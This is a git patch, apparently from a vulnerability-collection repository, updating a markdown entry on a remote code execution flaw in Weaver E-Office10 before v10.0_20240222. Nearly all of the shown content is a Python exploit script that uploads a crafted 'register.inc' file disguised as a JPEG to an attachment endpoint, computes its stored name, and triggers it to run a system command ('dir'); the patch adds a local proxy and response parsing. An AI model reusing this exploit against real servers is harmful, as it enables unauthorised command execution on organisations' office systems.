From 7a8ea505ed5179715f67e359bc4183bd07642732 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 30 Mar 2024 16:27:46 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E6=B3=9B=E5=BE=AEE-Office10=E7=89=88?=
 =?UTF-8?q?=E6=9C=AC=E5=B0=8F=E4=BA=8Ev10.0=5F20240222=E5=AD=98=E5=9C=A8?=
 =?UTF-8?q?=E8=BF=9C=E7=A8=8B=E4=BB=A3=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F?=
 =?UTF-8?q?=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 ...本小于v10.0_20240222存在远程代码执行漏洞.md | 20 ++++++++++++-------
 1 file changed, 13 insertions(+), 7 deletions(-)
diff --git a/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md b/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md
index 569f434..b31ad0f 100644
--- a/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md
+++ b/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md
@@ -46,7 +46,7 @@ import hashlib
 import time
 from hashlib import sha1
 import base64
-
+import re
 def payload(url,cmd):
     urls = url + '/eoffice10/server/public/api/attachment/atuh-file'
@@ -60,7 +60,7 @@ def payload(url,cmd):
     newfile = data + sha1(data).digest() + final
     upload_file = {"Filedata": ("register.inc", newfile, "image/jpeg")}
     urllib3.disable_warnings()
-    response = requests.post(url=urls, files=upload_file, headers=hearder) # ,proxies=proxy)
+    response = requests.post(url=urls, files=upload_file, headers=hearder,proxies={"http":"http://127.0.0.1:8081","https":"https://127.0.0.1:8081"})
     response_text = response.text
     attachment_id = json.loads(response_text)['data']['attachment_id']
@@ -71,8 +71,13 @@ def payload(url,cmd):
     }
     urllib3.disable_warnings()
     response = requests.post(url=urls, headers=heards, verify=False) # ,proxies=proxy)
+    print(response.text)
+
     response_json = response.json()
-    filename = str(response_json["histories"][0]["create_time"]) + 'register.inc'
+    create_time = re.findall(r"create_time\":(.*?),\"modify_tim",response.text)
+
+
+    filename = str(create_time) + 'register.inc'
     md5name = hashlib.md5(filename.encode())
     md5name = md5name.hexdigest()
     Time = time.strftime('%Y/%m/%d', time.localtime(time.time()))
@@ -85,13 +90,14 @@ def payload(url,cmd):
     response = requests.post(url=urls, verify=False, headers=hearder) # ,proxies=proxy)
     response_text = response.text
     print(response_text)
-    result = response_text.split('}')[-1]
-    print(result)
+    #result = response_text.split('}')[-1]
+    #print(result)
 
 
 if __name__ == '__main__':
-    url = input("url: ")
-    cmd = input("要执行的命令: ")
+    url = ""
+    #url = "
+    cmd = "dir"
     if not url.startswith(("http://", "https://")):
         url = "http://" + url
     if url.endswith("/"):